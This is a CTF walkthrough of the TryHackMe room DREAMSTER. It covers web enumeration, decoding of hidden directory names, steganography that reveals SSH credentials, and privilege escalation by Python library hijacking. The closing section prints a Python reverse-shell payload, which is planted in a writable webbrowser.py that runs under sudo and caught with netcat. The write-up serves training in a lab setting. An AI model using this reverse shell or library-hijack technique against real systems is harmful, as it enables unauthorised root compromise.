TryHackMe | DREAMSTER — Walkthrough
Box link: https://tryhackme.com/jr/dreamsterbt
The server protected by rabbit holes
Hey technophiles,
In this article we discuss about how to gain root access to TryHackMe easy room DREAMSTER. Which was a funny & easy entertaining room created rockybai and 7h3h4ckv157. There’s a SSH credential hidden in web & after, we’ve to hijack the python library to compromise the server. So let’s dive in.
So we are going to start over nmap. The scan results are shown below.
nmap -A -Pn 10.10.42.16
Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–11 13:03 IST
Nmap scan report for 10.10.42.16
Host is up (0.65s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Inceptive Agents Area
1111/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 82:e7:23:04:43:cf:8f:cd:39:70:32:8e:7c:f2:cc:ee (RSA)
| 256 d9:25:7a:e4:c8:0d:a2:32:47:5c:bc:cb:0f:b5:f3:c8 (ECDSA)
|_ 256 d7:ee:6e:f8:4c:98:43:c8:ae:94:8e:77:81:97:07:09 (ED25519)
Service Info: OS: Linux; CPE:
Port 80 & 1111 opened.
Port 80 : HTTP Apache httpd 2.4.41
Port 1111: openSSH 8.2p1 Ubuntu 4ubuntu0.2
So let’s take a quick look on web page. & find out what’s going on.
Nothing informative, for further step we’ve to enumerate the source code. Now we can see another direction.
Inside the script tag there is a directory named “ terminal.js ”
By checking the js file, we can see base64 encoded text→ “ L2RyMzRtM3Jz ”
(Hint: base of the day)
Simply, on terminal by typing ~# echo “L2RyMzRtM3Jz” | base64 -d
we can decode base64. (plain text of “L2RyMzRtM3Jz” → /dr34m3rs) which is another directory.
Although, The page again arise a question & as usual, we’ve to dig the source for a way forward.
By reading the source code, it’s crystal clear that the image we saw before (404.png) is stored inside the directory named /f1l3s.
So let’s dive into “ /f1l3s“.
An interesting file “ lol.txt ” is there inside the /f1l3s, which shows some numbers. Let’s decode.
If you noticed, the numbers are up to 0 to7. So it’s very easy to understand that’s octal. & thus we can decode without any mistake.
By following all these ways we met a new directory again. It was like a puzzle game when I tried at first. But if you are a real CTF enthusiastic, you’ll love this. So let’s check the directory ch3ck_1n.
By visiting the page for the first time itself my mind whispered I’ve to go through the source again. Shall we??
we got roadmap from this info leak, & by combining the 1st letters in those words we got the way towards another directory /drunk3n. By diving into the directory we can see the file uploading space.
Note: After multiple tries, we didn’t met any error/success. You can either capture the response through burp & enumerate or check the page source. Here I’m just going through the source code (that was easy for me). & I’m able to find something really interesting.
line number 26 to 48
<?php
if(isset($_FILES[‘file’])){
$errors= array();
$file_name = $_FILES[‘file’][‘name’];
$file_tmp =$_FILES[‘file’][‘tmp_name’];
$file_type=$_FILES[‘file’][‘type’];
$file_ext=strtolower(end(explode(‘.’,$_FILES[‘file’][‘name’])));
$extensions= array(“phtml”);
if(in_array($file_ext,$extensions)=== false){
$errors=”Extension not allowed”;
}
if(empty($errors)==true){
move_uploaded_file($file_tmp,”unknown/”.$file_name);
echo “Success”;
}else{
print_r($errors);
}}
?>
Important Turning point
The PHP script simply gives instructions to store the uploaded file into the directory called “ unknown ”. But you can see that $errors are set to print “Extensions not allowed”. & after checking the multiple conditions It’s clear, there is no error showing back to us. No errors/success are there & after checking the directory “ unknown “ inside the drunk3n & outside we got 404 errors. So we are digging inside the Rabbit 🐇 Hole. The “unknown” directory might be not present inthe server. Now I realized the HINT given in the description →The server protected by rabbit holes. When we do something right, a pathway is created. Unfortunately, a pathway is also created when we do something wrong. We basically build habits this way, both good and bad. So the reason we keep making the same mistakes is that we slip by default back into existing neural pathways.
Insanity is repeating the same mistakes and expecting different results.
From this point, I’m started brute-forcing & you can use dirb’s big.txt (which Hits the result). The response was 200 for “ztest”.
Note: I tried the directory search inside the current directory /drunk3n.
By reading the file “for_dreamer.txt” I’m Really confused. But in the end “==” triggered me towards Base64.
Base64 encoding algorithm converts any characters, binary data, and even images or sound files into a readable string, which can be saved or transported over the network without data loss. So now it’s easy to decode right ??
By decoding I got the image, which implies we’ve to dive somewhere else. That was the directory named “/d1sc0“. By visiting the page, I saw it allows user inputs as query.
By passing the inputs & enumerating results will easily understand that there’s nothing. as usual, let’s see what’s hidden inside the source code.
From the line 9 we got the way ahead. A new directory named “ /s0ck3t “.
The only thing left was an image → “dog_boy.jpg”.
Without extending more, I’m directly on my point. It was a steganographic image hiding some data. I’m using steghide for extracting the data for further investigation.
steghide extract -sf dog_to_decode.jpg
It ask for passphrase, I just typed “passphrase” as passphrase, just like hackers typing password123. I hope that’s easy to guess.
a text file →loot.txt extracted from the image.
dear ripper,
i hope the dreamers wont make to here…hope you will be reading this…
with all respect delete ur god damn passowrd..”ripperthegolddicker”….you know the port 1111 will provide communication through ssh…damn youuu..cheers,
agent root
As the result, we are close to the destination. SSH credentials found !! 🔥😎
Username: ripper
password: ripperthegolddicker
ssh ripper@machine-ip -p 1111
password: ripperthegolddicker
We own the user of room, now it’s time for privilege escalation. Sudo -l shows interesting results. We have the sudo permission for a particular file.
User ripper may run the following commands on pawner:
(root) NOPASSWD:/usr/bin/python3.8
/var/opt/rose/1_2/talk.py
By reading the content in talk.py we can understand that the python script executes chrome browser, for this purpose the library called webbrowser is imported. The webbrowser module can used to launch a browser in a platform-independent manner.
we can’t edit the contents of talk.py, to create this vulnerability, we need to locate the module file first. We used the locate command to find it.
We can edit the contents of /usr/lib/python3.8/webbrowser.py
Privilege Escalation steps (from USER to ROOT)
➟ Python Library Hijacking
we ran the sudo -l command to see which scripts or binaries we can run with elevated access. We see that we can use python3.8 to run the test.py by Importing a module webbrowser. We use the locate command to find the location of the module and find that it is located inside /usr/lib/python3.8. Next, we check for permissions for the module and find that it is writable by user ripper (We can edit the contents of /usr/lib/python3.8/webbrowser.py).
We use the vim editor to open the module file and add the python reverse shell script inside the function that is called by the test.py file. We saw earlier that it opens up a webpage in the browser. So, it will be using an open function. Hence, we will add the reverse shellcode as depicted below.
Payload is given below ⬇
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“your-IP”,PORT));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2)
import pty
pty.spawn(“/bin/bash”)
After editing the module file, we save and close the editor. Back on the Attacking machine console, we open a Netcat listener on the port mentioned in the reverse shell script and then come back to the shell as the ripperuser and execute the test.py script with sudo as shown in the image.
Machine is pwned…!! ~#whoami
→Super User
→ ROOT
